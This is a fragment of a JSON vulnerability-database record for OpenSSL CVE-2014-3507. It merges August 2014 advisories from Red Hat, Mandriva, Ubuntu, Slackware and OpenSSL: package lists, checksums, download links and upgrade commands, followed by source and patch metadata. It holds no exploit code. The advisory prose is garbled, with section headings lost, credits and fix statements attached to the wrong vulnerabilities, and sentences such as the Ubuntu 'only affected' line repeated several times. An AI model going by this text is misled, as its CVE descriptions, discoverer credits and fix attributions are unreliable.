6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nppc64:\nopenssl-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-static-1.0.1e-34.el7_0.4.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-static-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-static-1.0.1e-34.el7_0.4.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-3505.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3506.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3507.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3508.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3509.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3510.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3511.html\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://www.openssl.org/news/secadv_20140806.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFT69raXlSAg2UNWIIRAiQAAKCbp6Iou4mHuootBfgs0jm7zP/wWACgt50C\npHXxupQnHYYH+zJFOmk5u8o=\n=DwUW\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n \n The updated packages have been upgraded to the 1.0.0n version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510\n http://www.openssl.org/news/secadv_20140806.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 17007f558e739eb863c8507d520ffbc9 mbs1/x86_64/lib64openssl1.0.0-1.0.0n-1.mbs1.x86_64.rpm\n f810bbe20b2de26cb99d13ddaf0ac2fa mbs1/x86_64/lib64openssl-devel-1.0.0n-1.mbs1.x86_64.rpm\n 54d87a61ca0440dc5f344931de1ff43e mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0n-1.mbs1.x86_64.rpm\n 5b1748370e5a855cc31d3eec7673da5e mbs1/x86_64/lib64openssl-static-devel-1.0.0n-1.mbs1.x86_64.rpm\n 7e19a555629b4a2d3d4533be7786ce5e mbs1/x86_64/openssl-1.0.0n-1.mbs1.x86_64.rpm \n a9e74f2bab2878f601cfb44620c76dbb mbs1/SRPMS/openssl-1.0.0n-1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFT5HsDmqjQ0CJFipgRAhA5AJ0ZoDe2+SA7K7xk+NZLedQBVoFVvgCffPW9\n5geoq7aMnxbnw5eTuuH+iIs=\n=CK7e\n-----END PGP SIGNATURE-----\n. ============================================================================\nUbuntu Security Notice USN-2308-1\nAugust 07, 2014\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. When OpenSSL is used with certain\napplications, an attacker may use this issue to possibly gain access to\nsensitive information. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS\nand Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-5139)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.5\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.17\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.20\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. \n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz\n3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz\n075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz\n92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\ndf5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz\n582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz\nb80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz\n0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\nd1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz\nec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz\n25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz\n4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nf2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz\n4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz\n27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz\n\nSlackware x86_64 -current packages:\n8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz\nfd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. OpenSSL Security Advisory [6 Aug 2014]\n========================================\n\nInformation leak in pretty printing functions (CVE-2014-3508)\n=============================================================\n\nA flaw in OBJ_obj2txt may cause pretty printing functions such as\nX509_name_oneline, X509_name_print_ex et al. to leak some information from the\nstack. Applications may be affected if they echo pretty printing output to the\nattacker. OpenSSL SSL/TLS clients and servers themselves are not affected. \n\nThanks to Ivan Fratric (Google) for discovering this issue. This issue\nwas reported to OpenSSL on 19th June 2014. \n\nThe fix was developed by Emilia K\u00e4sper and Stephen Henson of the OpenSSL\ndevelopment team. This can\nbe exploited through a Denial of Service attack. \n\nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Joonas Kuorilehto and Riku Hietam\u00e4ki (Codenomicon) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 2nd July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nOpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this\nissue. This issue was reported to OpenSSL on 8th July 2014. \n\nThe fix was developed by Gabor Tyukasz. \n\n\nDouble Free when processing DTLS packets (CVE-2014-3505)\n========================================================\n\nAn attacker can force an error condition which causes openssl to crash whilst\nprocessing DTLS packets due to memory being freed twice. This can be exploited\nthrough a Denial of Service attack. \n\nThanks to Adam Langley and Wan-Teh Chang (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 6th June\n2014. \n\nThe fix was developed by Adam Langley. This can be exploited through a Denial of\nService attack. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. This can be exploited through a Denial of Service attack. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. \n\nOpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)\n===============================================================\n\nOpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a\ndenial of service attack. A malicious server can crash the client with a null\npointer dereference (read) by specifying an anonymous (EC)DH ciphersuite and\nsending carefully crafted handshake messages. \n\nOpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i. \n\nThanks to Felix Gr\u00f6bert (Google) for discovering and researching this issue. \nThis issue was reported to OpenSSL on 18th July 2014. \n\nThe fix was developed by Emilia K\u00e4sper of the OpenSSL development team. \n\nOpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i. \n\nThanks to David Benjamin and Adam Langley (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 21st July 2014. \n\nThe fix was developed by David Benjamin. \n\n\nSRP buffer overrun (CVE-2014-3512)\n==================================\n\nA malicious client or server can send invalid SRP parameters and overrun\nan internal buffer. Only applications which are explicitly set up for SRP\nuse are affected. \n\nThanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC\nGroup) for discovering this issue. This issue was reported to OpenSSL\non 31st July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20140806.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time", "sources": [ { "db": "NVD", "id": "CVE-2014-3507" }, { "db": "JVNDB", "id": "JVNDB-2014-003811" }, { "db": "BID", "id": "69078" }, { "db": "VULMON", "id": "CVE-2014-3507" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127869" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3507", "trust": 3.8 }, { "db": "BID", "id": "69078", "trust": 1.4 }, { "db": "SECUNIA", "id": "61250", "trust": 1.1 }, { "db": "SECUNIA", "id": "59710", "trust": 1.1 }, { "db": "SECUNIA", "id": "61184", "trust": 1.1 }, { "db": "SECUNIA", "id": "60938", "trust": 1.1 }, { "db": "SECUNIA", "id": "60684", "trust": 1.1 }, { "db": "SECUNIA", "id": "61775", "trust": 1.1 }, { "db": "SECUNIA", "id": "60022", "trust": 1.1 }, { "db": "SECUNIA", "id": "60493", "trust": 1.1 }, { "db": "SECUNIA", "id": "60221", "trust": 1.1 }, { "db": "SECUNIA", "id": "59743", "trust": 1.1 }, { "db": "SECUNIA", "id": "60778", "trust": 1.1 }, { "db": "SECUNIA", "id": "61017", "trust": 1.1 }, { "db": "SECUNIA", "id": "59756", "trust": 1.1 }, { "db": "SECUNIA", "id": "60921", "trust": 1.1 }, { "db": "SECUNIA", "id": "61959", "trust": 1.1 }, { "db": "SECUNIA", "id": "60917", "trust": 1.1 }, { "db": "SECUNIA", "id": "61040", "trust": 1.1 }, { "db": "SECUNIA", "id": "59700", "trust": 1.1 }, { "db": "SECUNIA", "id": "60803", "trust": 1.1 }, { "db": "SECUNIA", "id": "60824", "trust": 1.1 }, { "db": "SECUNIA", "id": "61100", "trust": 1.1 }, { "db": "SECUNIA", "id": "58962", "trust": 1.1 }, { "db": "SECTRACK", "id": "1030693", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10109", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2014-003811", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "LENOVO", "id": "LEN-24443", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201408-131", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2014-3507", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130868", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128214", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128248", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127861", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127869", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127799", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127790", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127811", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169648", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3507" }, { "db": "BID", "id": "69078" }, { "db": "JVNDB", "id": "JVNDB-2014-003811" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127869" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-131" }, { "db": "NVD", "id": "CVE-2014-3507" } ] }, "id": "VAR-201408-0089", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44401007833333334 }, "last_update_date": "2024-07-23T21:30:26.317000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HPSBUX03095 SSRT101674", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04404655" }, { "title": "HPSBOV03099 SSRT101686", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04426586" }, { "title": "HPSBHF03293", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "title": "1682293", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682293" }, { "title": "1686997", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "title": "Fix memory leak from zero-length DTLS fragments.", "trust": 0.8, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=d0a4b7d1a2948fce38515b8d862f43e7ba0ebf74" }, { "title": "DTLS memory leak from zero-length fragments (CVE-2014-3507)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv_20140806.txt" }, { "title": "Huawei-SA-20141008-OpenSSL", "trust": 0.8, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-372998.htm" }, { "title": "openssl-0.9.8zb", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51694" }, { "title": "openssl-1.0.1i", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51696" }, { "title": "openssl-1.0.0n", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51695" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2308-1" }, { "title": "Debian Security Advisories: DSA-2998-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=bfd576c692d8814b2a331baf29ad367c" }, { "title": "Amazon Linux AMI: ALAS-2014-391", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-391" }, { "title": "Symantec Security Advisories: SA85 : OpenSSL Security Advisory 06-Aug-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=02a206cf2efb06aecdaf29aeca851b55" }, { "title": "MiniProject2019", "trust": 0.1, "url": "https://github.com/ruan777/miniproject2019 " }, { "title": "wormhole", "trust": 0.1, "url": "https://github.com/jumanjihouse/wormhole " }, { "title": "oval", "trust": 0.1, "url": "https://github.com/jumanjihouse/oval " }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3507" }, { "db": "JVNDB", "id": "JVNDB-2014-003811" }, { "db": "CNNVD", "id": "CNNVD-201408-131" } ] }, "problemtype_data": { "@context": { "@vocab": 